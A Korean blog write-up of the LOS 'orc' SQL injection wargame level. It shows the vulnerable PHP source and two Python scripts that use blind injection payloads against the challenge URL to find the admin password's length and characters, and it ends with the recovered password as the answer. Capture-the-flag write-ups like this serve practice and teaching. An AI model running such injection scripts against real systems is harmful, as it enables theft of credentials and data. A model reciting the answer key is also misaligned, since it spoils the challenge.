[LOS] orc 풀이 - 4번

[LOS] gremlin 풀이

 

PHP & query 

<?php 
  include "./config.php"; 
  login_chk(); 
  $db = dbconnect(); 
  if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~"); 
  $query = "select id from prob_orc where id='admin' and pw='{$_GET[pw]}'"; 
  echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if($result['id']) echo "<h2>Hello admin</h2>"; 
   
  $_GET[pw] = addslashes($_GET[pw]); 
  $query = "select pw from prob_orc where id='admin' and pw='{$_GET[pw]}'"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("orc"); 
  highlight_file(__FILE__); 
?>

 

select id from prob_orc where id='admin' and pw=''

 

문제 풀이

solve 조건

if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("orc");

정확한 pw값를 알아내야 해결할 수 있다.

 

Blind Injection

 

Blind Injection은 SQL Injection 공격 시 오류메세지가 출력되지 않을 때 참/거짓을 통해 원하는 DB 정보를 얻어내는 공격기법이다.

 

해당 문제에서는 블라인들 인젝션을 요구하고 있다.

먼저 참/거짓을 판단할 수 있는 구문을 탐색한다.

 

if($result['id']) echo "<h2>Hello admin</h2>"; 

 해당 구문을 보자 id값이 있기만하면 Hello admin을 출력해주고 있다. 이를 이용하여 참/거짓을 판단한다.

select id from prob_orc where id='admin' and pw='' or 수식

 id='admin' and pw='' 는 무조건 거짓이다 뒤 수식의 여부에따라 Hello admin을 출력해 줄것이다.

 

직접 하면 시간이 오래걸리니 Python Code로 작성한다.

 

길이알아내기

import requests

URL='https://los.rubiya.kr/chall/orc_60e5b360f95c1f9688e4f3a86c5dd494.php'
headers = {'Content-Type': 'application/json; charset=utf-8'}
cookies = {'PHPSESSID': '내쿠기값'}
password = ''

for i in range(100):
    query={'pw': '\' or length(pw) = '+str(i)+' # '}
    res=requests.get(URL, params=query, headers=headers, cookies=cookies)
    if('Hello admin' in res.text):
        print(i)

select id from prob_orc where id='admin' and pw='' or length(pw) = 숫자

해당 쿼리문을 넘겨주는 파이썬 코드이다. length(pw) = 숫자가 참이라면 Hello admin을 출력할 것이다. 

4와 8을 출력한다. pw의 길이는 4와 8중에 하나이다

 

pw알아내기

import requests

URL='https://los.rubiya.kr/chall/orc_60e5b360f95c1f9688e4f3a86c5dd494.php'
headers = {'Content-Type': 'application/json; charset=utf-8'}
cookies = {'PHPSESSID': '내쿠기값'}
password = ''

for i in range(8):
    for  j in range(ord('0'),ord('z')+1):
        query={'pw': '\' or substr(pw,'+str(i+1)+',1) = \'' + chr(j) + '\'#' }
        res=requests.get(URL, params=query, headers=headers, cookies=cookies)
        if('Hello admin' in res.text):
            password = password + chr(j)
            print(password)
            break;

select id from prob_orc where id='admin' and pw='' or substr(pw,n번째문자,1)

길이를 8로해서 돌렸다. substr은 문자열을 분리하여 원하는 위치에 문자열을 가져오게 해준다.

 095A9852 값이 나왔다.

 A값이 소문자로 입력해야 정답으로 인정되는데 원인을 아직 모르겠다.

 

URL

los.rubiya.kr/chall/orc_60e5b360f95c1f9688e4f3a86c5dd494.php?pw=095a9852